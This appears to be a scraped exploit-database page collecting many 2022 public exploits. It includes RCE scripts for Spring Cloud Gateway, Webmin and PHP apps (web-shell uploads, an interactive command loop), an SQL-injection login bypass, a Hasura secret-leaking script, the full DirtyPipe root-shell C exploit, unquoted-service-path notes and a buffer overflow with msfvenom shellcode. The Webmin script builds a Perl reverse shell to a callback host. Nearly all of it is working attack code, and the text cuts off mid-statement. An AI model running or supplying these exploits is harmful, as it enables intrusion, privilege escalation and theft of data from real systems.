ISHACK AI BOT

# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 03/03/2022 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://spring.io/ # Software Link: https://spring.io/projects/spring-cloud-gateway # Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1 # Tested on: 3.1.0 # CVE : CVE-2022-22947 import random import string import requests import json import sys import urllib.parse import base64 headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} proxies = { 'http': 'http://172.29.32.1:8081', 'https': 'http://172.29.32.1:8081', } id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) def exploit(url, command): payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8') rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False) if(rbase.status_code == 201): print("[+] Stage deployed to /actuator/gateway/routes/"+id) print("[+] Executing command...") r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False) if(r.status_code == 200): print("[+] getting result...") r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) if(r.status_code == 200): get_response = r.json() clean(url, id) return get_response['filters'][0].split("'")[1] else: print("[-] Error: Invalid response") clean(url, id) exit(1) else: clean(url, id) print("[-] Error executing command") def clean(url, id): remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) if(remove.status_code == 200): print("[+] Stage removed!") else: print("[-] Error: Fail to remove stage") def banner(): print(""" ################################################### # # # Exploit for CVE-2022-22947 # # - Carlos Vieira (Crowsec) # # # # Usage: # # python3 exploit.py <url> <command> # # # # Example: # # python3 exploit.py http://localhost:8080 'id' # # # ################################################### """) def main(): banner() if len(sys.argv) != 3: print("[-] Error: Invalid arguments") print("[-] Usage: python3 exploit.py <url> <command>") exit(1) else: url = sys.argv[1] command = sys.argv[2] print(exploit(url, command)) if __name__ == '__main__': main()

# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE) # Google Dork: NA # Date: 03/04/2022 # Exploit Author: Sunny Mehra @DSKMehra # Vendor Homepage: https://github.com/part-db/part-db # Software Link: https://github.com/part-db/part-db # Version: [ 0.5.11.] # Tested on: [KALI OS] # CVE : CVE-2022-0848 # --------------- #!/bin/bash host=127.0.0.1/Part-DB-0.5.10 #WEBHOST #Usage: Change host #Command: bash exploit.sh #EXPLOIT BY @DSKMehra echo "<?php system(id); ?>">POC.phtml #PHP Shell Code result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'` rm POC.phtml echo Shell Location : "$host/data/media/labels/$result"

# Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE) # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError # Interface class to display terminal messages class Interface(): def __init__(self): self.red = '\033[91m' self.green = '\033[92m' self.white = '\033[37m' self.yellow = '\033[93m' self.bold = '\033[1m' self.end = '\033[0m' def header(self): print('\n >> Attendance and Payroll System v1.0') print(' >> Unauthenticated Remote Code Execution') print(' >> By pr0z\n') def info(self, message): print(f"[{self.white}*{self.end}] {message}") def warning(self, message): print(f"[{self.yellow}!{self.end}] {message}") def error(self, message): print(f"[{self.red}x{self.end}] {message}") def success(self, message): print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}") upload_path = '/apsystem/admin/employee_edit_photo.php' shell_path = '/apsystem/images/shell.php' #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>" multipart_form_data = { 'id': 1, 'upload': (''), } files = {'photo': ('shell.php', shell_data)} output = Interface() output.header() # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: output.info("Usage: python3 rce.py http://127.0.0.1") sys.exit() # Upload the shell target = sys.argv[1] output.info(f"Uploading the web shell to {target}") r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False) # Validating shell has been uploaded output.info(f"Validating the shell has been uploaded to {target}") r = requests.get(target + shell_path, verify=False) try: r = requests.get(target + shell_path) if r.status_code == 200: output.success('Successfully connected to web shell\n') else: raise Exception except ConnectionError: output.error('We were unable to establish a connection') sys.exit() except: output.error('Something unexpected happened') sys.exit() # Remote code execution while True: try: cmd = input("\033[91mRCE\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False) if r.status_code == 200: print(r.text) else: raise Exception except KeyboardInterrupt: sys.exit() except ConnectionError: output.error('We lost our connection to the web shell') sys.exit() except: output.error('Something unexpected happened') sys.exit()

# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError print('\n >> Attendance and Payroll System v1.0') print(' >> Authentication Bypass through SQL injection') print(' >> By pr0z\n') login_path = '/apsystem/admin/login.php' index_path = '/apsystem/admin/index.php' payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login=" headers = {'Content-Type': 'application/x-www-form-urlencoded'} #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1") sys.exit() # Bypass Authentication target = sys.argv[1] print("[+] Extracting Administrator cookie using SQLi ...") sess = requests.Session() try: sess.get(target + index_path,headers=headers, verify=False) sess.post(target + login_path, data=payload, headers=headers,verify=False) except ConnectionError: print('[-] We were unable to establish a connection') sys.exit() cookie_val = sess.cookies.get_dict().get("PHPSESSID") print("[+] Use the following cookie:\n") print(f"PHPSESSID: {cookie_val}")

# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure # Software: Hasura GraphQL Community # Software Link: https://github.com/hasura/graphql-engine # Version: 2.2.0 # Exploit Author: Dolev Farhi # Date: 5/05/2022 # Tested on: Ubuntu import requests SERVER_ADDR = 'x.x.x.x' url = 'http://{}/v1/metadata'.format(SERVER_ADDR) print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read') while True: env_var = input('Type environment variable key to leak.\n> ') if not env_var: continue payload = { "type": "bulk", "source": "", "args": [ { "type": "add_remote_schema", "args": { "name": "ttt", "definition": { "timeout_seconds": 60, "forward_client_headers": False, "headers": [], "url_from_env": env_var }, "comment": "" } } ], "resource_version": 2 } r = requests.post(url, json=payload) try: print(r.json()['error'].split('not a valid URI:')[1]) except IndexError: print('Could not parse out VAR, dumping error as is') print(r.json().get('error', 'N/A'))

# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path # Date: 04/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.privateinternetaccess.com # Software Link: https://www.privateinternetaccess.com/download # Version: 3.3.0.100 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc PrivateInternetAccessService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PrivateInternetAccessService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Private Internet Access Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cloudflare.com/ # Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/ # Version: 1.4.107 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CloudflareWARP [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CloudflareWARP TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cloudflare WARP DEPENDENCIES : wlansvc SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.malwarebytes.com/ # Software Link: https://www.malwarebytes.com/mwb-download/ # Version: 4.5.0 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc MBAMService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MBAMService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Malwarebytes Service DEPENDENCIES : RPCSS : WINMGMT SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.foxit.com/pdf-reader/ # Software Link: https://www.foxit.com/downloads/#Foxit-Reader/ # Version: 11.0.1.49938 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc FoxitReaderUpdateService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FoxitReaderUpdateService TYPE : 110 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Foxit PDF Reader Update Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) // Exploit Author: blasty ([email protected]) // Original Author: Max Kellermann ([email protected]) // CVE: CVE-2022-0847 /* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <[email protected]> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #include <stdint.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif // small (linux x86_64) ELF file matroshka doll that does; // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); // write(fd, elfcode, elfcode_len) // chmod("/tmp/sh", 04755) // close(fd); // exit(0); // // the dropped ELF simply does: // setuid(0); // setgid(0); // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); unsigned char elfcode[] = { /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 }; /** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */ static void prepare_pipe(int p[2]) { if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; } /* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n; } /* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */ } int hax(char *filename, long offset, uint8_t *data, size_t len) { /* open the input file and validate the specified offset */ const int fd = open(filename, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return -1; } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return -1; } /* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); if (nbytes < 0) { perror("splice failed"); return -1; } if (nbytes == 0) { fprintf(stderr, "short splice\n"); return -1; } /* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */ nbytes = write(p[1], data, len); if (nbytes < 0) { perror("write failed"); return -1; } if ((size_t)nbytes < len) { fprintf(stderr, "short write\n"); return -1; } close(fd); return 0; } int main(int argc, char **argv) { if (argc != 2) { fprintf(stderr, "Usage: %s SUID\n", argv[0]); return EXIT_FAILURE; } char *path = argv[1]; uint8_t *data = elfcode; int fd = open(path, O_RDONLY); uint8_t *orig_bytes = malloc(sizeof(elfcode)); lseek(fd, 1, SEEK_SET); read(fd, orig_bytes, sizeof(elfcode)); close(fd); printf("[+] hijacking suid binary..\n"); if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] dropping suid shell..\n"); system(path); printf("[+] restoring suid binary..\n"); if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) { printf("[~] failed\n"); return EXIT_FAILURE; } printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n"); system("/tmp/sh"); return EXIT_SUCCESS; }

# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated) # Date: 2022-03-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.webmin.com/ # Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip # Version: <= 1.984 # Tested on: Ubuntu 18 # Reference: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell #!/usr/bin/python3 """ Coded by: @faisalfs10x GitHub: https://github.com/faisalfs10x Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ """ import requests import urllib3 import argparse import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TGREEN = '\033[32m' TRED = '\033[31m' TCYAN = '\033[36m' TSHELL = '\033[32;1m' ENDC = '\033[m' class Exploit(object): def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): self.target = target self.username = username self.password = password self.py3http_server = py3http_server self.pyhttp_port = pyhttp_port self.upload_path = upload_path self.callback_ip = callback_ip self.callback_port = callback_port self.fname = fname #self.proxies = proxies self.s = requests.Session() def gen_payload(self): payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) f = open(f"{self.fname}", "w") f.write(payload) f.close() def login(self): login_url = self.target + "/session_login.cgi" cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } data = { 'user' : self.username, 'pass' : self.password } try: r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) success_message = 'System hostname' if success_message in r.text: print(TGREEN + "[+] Login Successful", ENDC) else: print(TRED +"[-] Login Failed", ENDC) exit() except requests.Timeout as e: print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) exit() def pyhttp_server(self): print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up print('[+] Sleep 3 second to ensure http server is up!') time.sleep(3) # Sleep for 3 seconds to ensure http server is up! def download_remote_url(self): download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": self.target + "/filemin/?xnavigation=1" } data = { 'link': "http://" + self.py3http_server + "/" + self.fname, 'username': '', 'password': '', 'path': self.upload_path } r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") def modify_permission(self): modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" headers = { "Referer": self.target + "/filemin/?xnavigation=1" } data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) print(f"[+] Modifying permission of {self.fname} to 0755") def exec_revshell(self): url = self.target + '/' + self.fname try: r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) print("[+] Shell location: " + url) else: print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) def do_cleanup(self): print(TCYAN + '\n[+] Cleaning up ') print(f'[+] Killing: http.server on port {self.pyhttp_port}') os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') exit() def run(self): self.gen_payload() self.login() self.pyhttp_server() self.download_remote_url() self.modify_permission() self.exec_revshell() self.do_cleanup() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') args = parser.parse_args() target = args.target username = args.credential.split(':')[0] password = args.credential.split(':')[1] py3http_server = args.py3http_server pyhttp_port = py3http_server.split(':')[1] callback_ip = args.callback_ip callback_port = args.callback_port upload_path = "/usr/share/webmin" # the default installation of Webmin Debian Package, may be in different location if installed using other method. fname = "revshell.cgi" # CGI script name, you may change to different name pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run()

# Exploit Title: Cobian Backup 0.9 - Unquoted Service Path # Date: 06/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cobiansoft.com// # Software Link: https://www.cobiansoft.com/download.php/ # Version:0.9.93 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CobianReflectorService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CobianReflectorService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cobian Reflector\Cobian.Reflector.Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cobian Reflector Engine DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow # Exploit Author: Hejap Zairy # Date: 03.07.2022 # Software Link: https://www.litexmedia.com/acwizard.exe # Tested Version: v2.01 # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Audio Conversion Wizard and press Enter Code # 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' # 5.- Click 'OK' # Author Code By Hejap Zairy #!/usr/bin/env python from pwn import * buffer = "\x41" * 1016 push_esp = p32(0x1004dbff) #push esp ret ret from id3lib.dll nops = "\x90" * 15#515 tshhh theardlooo love Malware #msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20" #msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20" buf = b"" buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00" buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b" buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e" buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9" buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52" buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00" buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b" buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48" buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6" buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b" buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff" buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a" buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31" buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a" buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28" buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79" buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00" buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" padding ="C" * (len(buffer) - len(push_esp) - len(nops)) payload = buffer + push_esp + nops + buf + padding try: with 